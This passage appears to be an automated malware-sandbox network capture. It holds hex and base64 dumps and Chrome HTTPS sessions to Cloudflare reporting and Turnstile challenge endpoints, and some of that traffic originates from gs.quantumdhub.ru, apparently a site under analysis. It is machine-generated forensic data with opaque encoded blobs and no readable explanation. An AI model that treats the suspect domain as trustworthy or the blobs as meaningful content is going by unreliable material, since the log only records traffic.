                                                                            2024-12-19 14:36:24 UTC622INData Raw: 58 47 32 42 66 47 69 4c 52 6f 32 50 61 34 4e 6c 63 34 70 74 56 32 64 52 6c 5a 31 69 65 57 4e 30 6a 71 65 57 6c 70 61 61 72 57 74 34 64 36 47 72 68 59 4f 64 68 36 4f 41 72 33 57 6e 6d 58 6d 63 76 6f 6d 66 6b 61 36 63 67 5a 4f 36 76 58 71 36 6d 70 71 4b 6f 36 43 69 6f 74 4c 4e 7a 4a 43 56 71 35 62 48 6c 36 71 37 30 4c 44 56 31 5a 6e 56 30 38 53 75 74 74 75 78 75 62 75 63 76 62 65 6c 76 4d 6a 78 71 63 44 4e 78 4f 6d 32 30 64 54 4c 78 66 50 49 75 4d 76 65 31 50 54 4d 32 73 50 33 33 73 41 49 31 39 51 41 79 67 66 4f 78 66 6e 50 30 73 6e 76 45 51 30 57 42 67 33 57 37 65 6b 50 37 75 2f 70 46 66 49 41 34 67 4d 62 48 2b 62 30 4a 4f 67 61 33 78 30 6c 4a 4f 34 69 37 67 37 78 4b 52 66 77 2b 43 59 35 39 78 41 34 2b 44 6f 4f 52 41 45 50 4a 6a 30 6e 4f 54 49 61 47 30 55
                                                                            Data Ascii: XG2BfGiLRo2Pa4Nlc4ptV2dRlZ1ieWN0jqeWlpaarWt4d6GrhYOdh6OAr3WnmXmcvomfka6cgZO6vXq6mpqKo6CiotLNzJCVq5bHl6q70LDV1ZnV08SuttuxubucvbelvMjxqcDNxOm20dTLxfPIuMve1PTM2sP33sAI19QAygfOxfnP0snvEQ0WBg3W7ekP7u/pFfIA4gMbH+b0JOga3x0lJO4i7g7xKRfw+CY59xA4+DoORAEPJj0nOTIaG0U
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 34 67 5a 53 35 54 4d 46 63 2b 50 30 51 73 4b 43 6c 4e 4f 30 70 4b 61 44 52 6a 62 46 42 45 55 46 4a 71 62 58 5a 4d 59 47 73 33 59 46 68 67 65 46 31 66 68 58 5a 55 6a 45 56 35 5a 30 61 42 69 45 78 46 68 34 68 4f 6c 5a 68 77 57 58 64 38 6d 6f 69 48 6d 57 47 52 65 34 43 4f 6d 4a 6c 2b 6d 58 64 7a 69 4b 75 67 61 4c 47 6e 61 71 6d 71 6e 72 65 79 6c 4c 61 79 6b 35 53 56 6c 49 65 53 73 5a 4f 6a 6c 4c 66 41 76 35 65 66 6c 6e 32 6a 74 38 61 6d 7a 63 62 4b 77 63 58 46 71 38 6d 35 78 5a 6e 50 75 39 48 66 30 62 69 67 76 4f 50 67 7a 39 4f 33 36 4e 75 63 79 4b 58 4b 36 4d 50 4c 35 75 61 75 73 2f 44 75 36 64 48 76 73 4e 4f 35 2b 63 6a 70 74 76 7a 67 30 2f 72 31 78 4c 37 64 41 51 6a 35 41 66 37 70 43 73 34 4f 34 50 50 67 44 2b 6a 6a 2b 52 44 30 47 75 59 57 45 76 54 64 2b
                                                                            Data Ascii: 4gZS5TMFc+P0QsKClNO0pKaDRjbFBEUFJqbXZMYGs3YFhgeF1fhXZUjEV5Z0aBiExFh4hOlZhwWXd8moiHmWGRe4COmJl+mXdziKugaLGnaqmqnreylLayk5SVlIeSsZOjlLfAv5efln2jt8amzcbKwcXFq8m5xZnPu9Hf0bigvOPgz9O36NucyKXK6MPL5uaus/Du6dHvsNO5+cjptvzg0/r1xL7dAQj5Af7pCs4O4PPgD+jj+RD0GuYWEvTd+
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 42 49 7a 56 4a 52 6d 46 68 54 30 5a 4f 59 30 35 46 56 43 6c 35 51 55 6f 34 54 45 38 2b 4f 47 46 52 58 49 4e 61 56 6e 39 64 58 31 70 41 53 57 46 46 65 49 78 64 65 6d 46 65 63 55 2b 43 67 6e 4b 47 6c 58 43 50 62 5a 6d 4b 6c 6c 32 66 6e 70 36 64 6f 32 65 6d 66 4b 61 41 69 32 53 71 6d 6f 75 6b 72 4b 36 68 6b 37 42 33 6f 59 69 33 6b 49 71 37 75 36 71 4b 74 36 4f 69 6d 4b 52 2b 66 37 65 6d 6b 36 79 38 77 6f 54 43 72 63 2b 6b 30 71 61 79 6f 73 72 58 72 4d 71 58 33 61 6e 62 31 61 37 4f 75 5a 58 42 6f 37 4c 69 79 64 76 6c 33 4c 58 4f 71 63 72 59 36 66 50 6e 35 63 50 6c 30 75 7a 34 30 74 54 4a 31 62 33 56 31 39 72 62 75 74 51 47 33 74 6e 43 39 76 4c 57 44 65 62 38 79 64 30 47 43 65 48 54 37 65 6b 52 31 73 2f 6d 37 74 77 61 33 42 2f 67 49 4f 6f 54 39 52 51 57 4a 51
                                                                            Data Ascii: BIzVJRmFhT0ZOY05FVCl5QUo4TE8+OGFRXINaVn9dX1pASWFFeIxdemFecU+CgnKGlXCPbZmKll2fnp6do2emfKaAi2SqmoukrK6hk7B3oYi3kIq7u6qKt6OimKR+f7emk6y8woTCrc+k0qayosrXrMqX3anb1a7OuZXBo7Liydvl3LXOqcrY6fPn5cPl0uz40tTJ1b3V19rbutQG3tnC9vLWDeb8yd0GCeHT7ekR1s/m7twa3B/gIOoT9RQWJQ
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 58 33 46 48 53 6b 63 74 59 44 64 73 57 58 5a 6f 55 7a 52 62 66 6a 31 64 4e 47 46 30 63 54 69 47 67 47 6c 4b 59 32 5a 6e 54 6f 39 34 65 31 46 2b 58 6e 4e 56 56 6f 31 6b 6c 48 78 5a 64 33 52 32 63 33 65 58 6e 33 39 6a 6e 57 64 33 6b 70 6d 43 64 71 69 64 62 6d 69 69 66 4c 52 72 69 49 68 70 70 6e 61 78 69 71 69 4b 69 62 6c 79 73 4a 47 51 6d 61 36 2b 68 36 6d 61 77 71 75 6e 70 38 43 46 70 4a 79 39 7a 34 32 76 7a 4a 54 4d 6d 5a 69 38 72 62 79 30 6d 4c 32 34 31 72 66 6b 31 4f 50 66 77 36 62 68 33 73 47 34 36 62 7a 4e 33 75 54 30 72 4f 50 79 38 2b 33 55 7a 39 76 74 31 4d 72 63 33 73 6d 39 7a 37 76 6c 2b 50 76 59 38 74 30 45 32 39 72 6c 2b 74 6f 4a 32 73 58 64 43 65 2f 56 46 78 49 4a 36 2f 73 4f 48 2f 58 64 34 42 41 53 49 75 51 44 48 41 58 68 39 2b 4d 63 37 53 7a
                                                                            Data Ascii: X3FHSkctYDdsWXZoUzRbfj1dNGF0cTiGgGlKY2ZnTo94e1F+XnNVVo1klHxZd3R2c3eXn39jnWd3kpmCdqidbmiifLRriIhppnaxiqiKiblysJGQma6+h6mawqunp8CFpJy9z42vzJTMmZi8rby0mL241rfk1OPfw6bh3sG46bzN3uT0rOPy8+3Uz9vt1Mrc3sm9z7vl+PvY8t0E29rl+toJ2sXdCe/VFxIJ6/sOH/Xd4BASIuQDHAXh9+Mc7Sz
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 56 64 4e 64 47 56 45 64 6d 35 75 58 6f 46 79 67 6d 32 45 65 45 2b 48 68 33 68 6b 52 57 68 4a 54 6b 57 48 51 30 78 6b 54 55 35 57 62 6c 69 44 5a 6d 53 54 56 56 71 4f 6a 36 4b 56 62 49 56 68 6c 5a 6d 48 67 48 79 49 61 59 56 70 6f 58 75 45 72 57 31 79 6b 34 43 56 67 59 57 36 75 70 61 74 66 58 79 53 65 62 68 39 6d 4d 58 42 6c 35 79 6b 79 4d 79 66 7a 73 57 39 6a 38 6a 51 7a 70 79 67 6a 63 36 6f 75 4a 54 61 70 64 71 70 6e 70 61 58 76 72 47 74 35 4f 66 6f 71 4a 2f 6a 71 71 4c 61 74 73 54 49 78 62 43 75 79 65 48 6e 38 39 6e 79 73 66 6e 54 32 50 48 49 32 2f 4c 38 77 4e 7a 6c 78 63 59 4a 41 41 54 6d 77 2f 72 6a 33 68 4c 39 7a 2b 58 6d 34 51 55 57 43 51 72 56 32 67 33 6e 44 65 6b 63 47 43 4d 55 41 39 37 2b 45 4f 54 2b 4c 43 77 6d 46 77 6f 6f 4c 4f 34 79 2f 52 38 47
                                                                            Data Ascii: VdNdGVEdm5uXoFygm2EeE+Hh3hkRWhJTkWHQ0xkTU5WbliDZmSTVVqOj6KVbIVhlZmHgHyIaYVpoXuErW1yk4CVgYW6upatfXySebh9mMXBl5ykyMyfzsW9j8jQzpygjc6ouJTapdqpnpaXvrGt5OfoqJ/jqqLatsTIxbCuyeHn89nysfnT2PHI2/L8wNzlxcYJAATmw/rj3hL9z+Xm4QUWCQrV2g3nDekcGCMUA97+EOT+LCwmFwooLO4y/R8G
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 4e 6e 57 33 4a 69 59 6a 73 2f 66 56 35 55 51 32 52 33 69 59 70 58 5a 6f 75 51 53 47 74 77 63 6f 6c 75 54 6d 5a 6d 61 35 64 77 66 6f 39 72 63 4a 32 54 6a 6e 4f 47 65 48 35 33 58 32 4e 37 6e 5a 31 6f 70 57 36 77 72 61 36 73 73 71 2b 74 6d 49 32 62 69 4a 32 76 6c 72 57 41 72 59 79 66 66 58 65 67 6c 4a 32 48 69 4d 4a 2b 6a 61 79 6b 7a 38 2f 42 72 49 2f 54 71 6f 2f 52 31 35 4b 38 70 70 72 4e 73 37 54 55 73 74 76 4f 73 72 2f 62 35 74 6d 37 75 2b 47 38 71 37 66 47 7a 64 50 70 79 65 57 78 39 65 47 7a 34 74 76 64 32 72 7a 74 7a 50 48 72 30 39 4c 44 41 77 54 35 32 41 76 70 31 65 50 36 41 41 6a 70 35 50 4c 4c 34 4e 37 6d 43 2b 37 32 45 66 77 4b 47 2f 54 72 44 2f 33 63 34 66 4c 64 42 78 73 63 34 2f 6a 6c 47 52 76 75 2b 76 34 73 45 54 55 4e 39 75 6b 6b 39 51 54 79 4b
                                                                            Data Ascii: NnW3JiYjs/fV5UQ2R3iYpXZouQSGtwcoluTmZma5dwfo9rcJ2TjnOGeH53X2N7nZ1opW6wra6ssq+tmI2biJ2vlrWArYyffXeglJ2HiMJ+jaykz8/BrI/Tqo/R15K8pprNs7TUstvOsr/b5tm7u+G8q7fGzdPpyeWx9eGz4tvd2rztzPHr09LDAwT52Avp1eP6AAjp5PLL4N7mC+72EfwKG/TrD/3c4fLdBxsc4/jlGRvu+v4sETUN9ukk9QTyK
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 63 68 55 5a 65 58 55 46 43 52 33 52 4c 54 58 78 78 63 6d 43 4a 64 59 78 49 68 55 36 54 5a 46 5a 63 6c 5a 4b 64 61 35 78 35 63 35 4f 57 66 32 39 33 6f 32 53 6d 67 48 5a 2b 65 58 70 35 62 36 36 63 67 32 69 58 64 70 4f 7a 6a 5a 61 6d 65 6e 32 53 6d 36 79 2b 66 4c 69 42 66 36 61 43 70 36 65 71 76 73 43 4a 72 4c 6d 72 76 4c 36 55 6a 4e 4b 70 30 71 75 6e 31 4a 76 5a 79 75 44 58 31 73 48 4f 32 38 48 6d 73 4e 50 55 78 71 6d 72 79 73 76 4d 7a 74 4f 71 78 4f 6e 6a 78 4d 6a 75 35 76 72 45 30 66 6e 37 79 72 72 35 75 66 6e 37 77 39 66 45 36 74 77 4a 79 77 6e 36 32 2f 41 43 42 74 4d 42 44 64 54 79 34 76 48 78 2b 51 76 7a 31 4e 58 62 49 68 7a 62 2f 50 66 6b 34 78 48 69 42 78 63 6f 4c 52 34 66 44 65 73 4b 41 65 37 72 37 78 67 55 4b 69 34 61 42 68 51 72 47 68 38 52 51 6b
                                                                            Data Ascii: chUZeXUFCR3RLTXxxcmCJdYxIhU6TZFZclZKda5x5c5OWf293o2SmgHZ+eXp5b66cg2iXdpOzjZamen2Sm6y+fLiBf6aCp6eqvsCJrLmrvL6UjNKp0qun1JvZyuDX1sHO28HmsNPUxqmrysvMztOqxOnjxMju5vrE0fn7yrr5ufn7w9fE6twJywn62/ACBtMBDdTy4vHx+Qvz1NXbIhzb/Pfk4xHiBxcoLR4fDesKAe7r7xgUKi4aBhQrGh8RQk
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 56 33 65 45 58 6f 2b 4d 5a 35 47 49 53 32 32 45 64 6f 5a 30 57 6d 71 57 69 56 78 5a 67 49 4b 6a 59 4a 47 47 58 59 68 33 63 32 70 38 68 58 69 6d 5a 33 2b 72 6f 58 36 6d 73 48 61 66 72 72 65 75 71 5a 6d 2b 64 36 72 41 66 4c 53 38 65 73 4f 6c 75 36 43 2b 6c 4b 4f 30 6d 61 44 44 77 36 65 61 6d 38 44 46 6b 74 57 7a 30 4d 61 72 32 39 72 4d 70 37 2f 5a 73 4d 50 42 32 2b 50 69 77 75 6e 71 34 64 75 74 33 76 43 71 71 61 7a 30 35 2b 4c 56 37 73 54 32 39 64 7a 6d 75 66 50 65 41 76 6a 41 39 75 2f 38 7a 38 66 46 36 66 4c 47 78 64 62 6a 7a 4e 76 68 2f 66 48 69 30 64 49 4e 36 66 6b 61 42 66 4c 2b 46 50 59 4d 2f 67 30 56 2f 41 37 32 39 65 44 38 42 67 44 33 4a 69 66 71 43 67 51 4d 41 68 38 6e 4a 76 41 4d 4f 77 55 53 47 51 6f 74 44 6a 30 73 44 54 41 6c 2f 54 63 6d 4b 68 63
                                                                            Data Ascii: V3eEXo+MZ5GIS22EdoZ0WmqWiVxZgIKjYJGGXYh3c2p8hXimZ3+roX6msHafrreuqZm+d6rAfLS8esOlu6C+lKO0maDDw6eam8DFktWz0Mar29rMp7/ZsMPB2+Piwunq4dut3vCqqaz05+LV7sT29dzmufPeAvjA9u/8z8fF6fLGxdbjzNvh/fHi0dIN6fkaBfL+FPYM/g0V/A729eD8BgD3JifqCgQMAh8nJvAMOwUSGQotDj0sDTAl/TcmKhc
                                                                            2024-12-19 14:36:24 UTC1369INData Raw: 48 42 2b 5a 35 4e 6b 59 32 39 7a 6a 49 71 4c 6d 32 5a 70 59 4a 39 74 59 59 47 54 63 48 36 64 66 36 71 70 70 59 32 74 71 70 6d 64 68 71 71 6f 69 6f 2b 51 71 49 6d 37 69 5a 74 39 71 36 35 33 6c 49 32 75 66 62 47 56 73 48 2b 30 6b 73 6a 43 78 70 32 75 7a 4d 48 43 70 72 7a 54 31 64 4f 56 6c 36 2b 4e 6b 70 4f 63 75 4d 47 38 31 63 47 37 76 4c 2b 6e 75 74 36 7a 31 37 33 65 79 4e 69 72 33 2b 4c 70 34 65 76 30 38 36 72 31 77 73 62 7a 2f 64 4c 4b 7a 72 66 33 37 67 62 45 32 76 6a 67 36 4f 66 6a 42 67 76 37 42 75 45 4e 42 41 49 53 42 4f 58 53 46 42 59 59 47 68 34 4e 48 65 2f 35 46 77 41 42 4a 52 49 59 4b 65 63 42 38 69 6f 67 47 66 7a 2b 4b 69 67 77 4c 68 34 46 39 69 34 6b 4a 77 34 47 45 50 4d 4d 4f 2f 77 65 46 55 56 43 42 41 54 2b 46 42 38 6f 48 41 74 43 4f 45 45 6a
                                                                            Data Ascii: HB+Z5NkY29zjIqLm2ZpYJ9tYYGTcH6df6qppY2tqpmdhqqoio+QqIm7iZt9q653lI2ufbGVsH+0ksjCxp2uzMHCprzT1dOVl6+NkpOcuMG81cG7vL+nut6z173eyNir3+Lp4ev086r1wsbz/dLKzrf37gbE2vjg6OfjBgv7BuENBAISBOXSFBYYGh4NHe/5FwABJRIYKecB8iogGfz+KigwLh4F9i4kJw4GEPMMO/weFUVCBAT+FB8oHAtCOEEj


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.174973635.190.80.14436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:24 UTC538OUTOPTIONS /report/v4?s=6rM%2BDxF2KXBxp70hbns%2BP4nKj0uXQiqt5MX1Dqo4McVJjxDTewf9%2BLi9aBksM2KAz8wPydkmdKzPGl0%2BDyCjbhx5KjCKy6bhKxPqXeylL1LCwSxm4l2CszF07jf6BA%3D%3D HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Origin: https://gs.quantumdhub.ru
                                                                            Access-Control-Request-Method: POST
                                                                            Access-Control-Request-Headers: content-type
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:25 UTC336INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            access-control-max-age: 86400
                                                                            access-control-allow-methods: POST, OPTIONS
                                                                            access-control-allow-origin: *
                                                                            access-control-allow-headers: content-length, content-type
                                                                            date: Thu, 19 Dec 2024 14:36:24 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.174973735.190.80.14436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:26 UTC478OUTPOST /report/v4?s=6rM%2BDxF2KXBxp70hbns%2BP4nKj0uXQiqt5MX1Dqo4McVJjxDTewf9%2BLi9aBksM2KAz8wPydkmdKzPGl0%2BDyCjbhx5KjCKy6bhKxPqXeylL1LCwSxm4l2CszF07jf6BA%3D%3D HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 457
                                                                            Content-Type: application/reports+json
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:26 UTC457OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 73 2e 71 75 61 6e 74 75 6d 64 68 75 62 2e 72 75 2f 48 58 38 68 69 4c 50 61 64 61 7a 31 4e 37 57 72 6c 74 70 50 6a 48 67 33 34 71 5f 32 43 39 38 69 67 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 31 32 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72
                                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":333,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/","sampling_fraction":1.0,"server_ip":"104.21.112.1","status_code":404,"type":"http.err
                                                                            2024-12-19 14:36:26 UTC168INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            date: Thu, 19 Dec 2024 14:36:26 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.1749738104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:26 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:27 UTC379INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 19 Dec 2024 14:36:26 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 7
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            cf-chl-out: kzP4ENNraJ7L5lvIFkMhS1sRKuDePW099Bc=$Ds/ylfprOtH/ghZk
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481ffc6cbe41cd-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:27 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                            Data Ascii: invalid


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.1749739104.18.95.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:26 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f481fd4183442af/1734618984616/648a1742b74a790355ded4efe2ab085daee43b16d2974c62784ee075a5e327a9/asbbOwmG_QR4EhL HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Cache-Control: max-age=0
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:27 UTC143INHTTP/1.1 401 Unauthorized
                                                                            Date: Thu, 19 Dec 2024 14:36:27 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 1
                                                                            Connection: close
                                                                            2024-12-19 14:36:27 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 5a 49 6f 58 51 72 64 4b 65 51 4e 56 33 74 54 76 34 71 73 49 58 61 37 6b 4f 78 62 53 6c 30 78 69 65 45 37 67 64 61 58 6a 4a 36 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gZIoXQrdKeQNV3tTv4qsIXa7kOxbSl0xieE7gdaXjJ6kAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                            2024-12-19 14:36:27 UTC1INData Raw: 4a
                                                                            Data Ascii: J


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.1749740104.18.95.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:28 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f481fd4183442af/1734618984617/Jf0Unnedg83rw87 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:29 UTC200INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:28 GMT
                                                                            Content-Type: image/png
                                                                            Content-Length: 61
                                                                            Connection: close
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f4820084961c484-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:29 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3b 00 00 00 36 08 02 00 00 00 f6 d9 76 3a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                            Data Ascii: PNGIHDR;6v:IDAT$IENDB`


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.1749741104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:30 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f481fd4183442af/1734618984617/Jf0Unnedg83rw87 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:30 UTC200INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:30 GMT
                                                                            Content-Type: image/png
                                                                            Content-Length: 61
                                                                            Connection: close
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f482012aa2f8c8d-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:30 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3b 00 00 00 36 08 02 00 00 00 f6 d9 76 3a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                            Data Ascii: PNGIHDR;6v:IDAT$IENDB`


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.1749742104.18.95.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:30 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 31375
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Content-type: application/x-www-form-urlencoded
                                                                            CF-Chl-RetryAttempt: 0
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
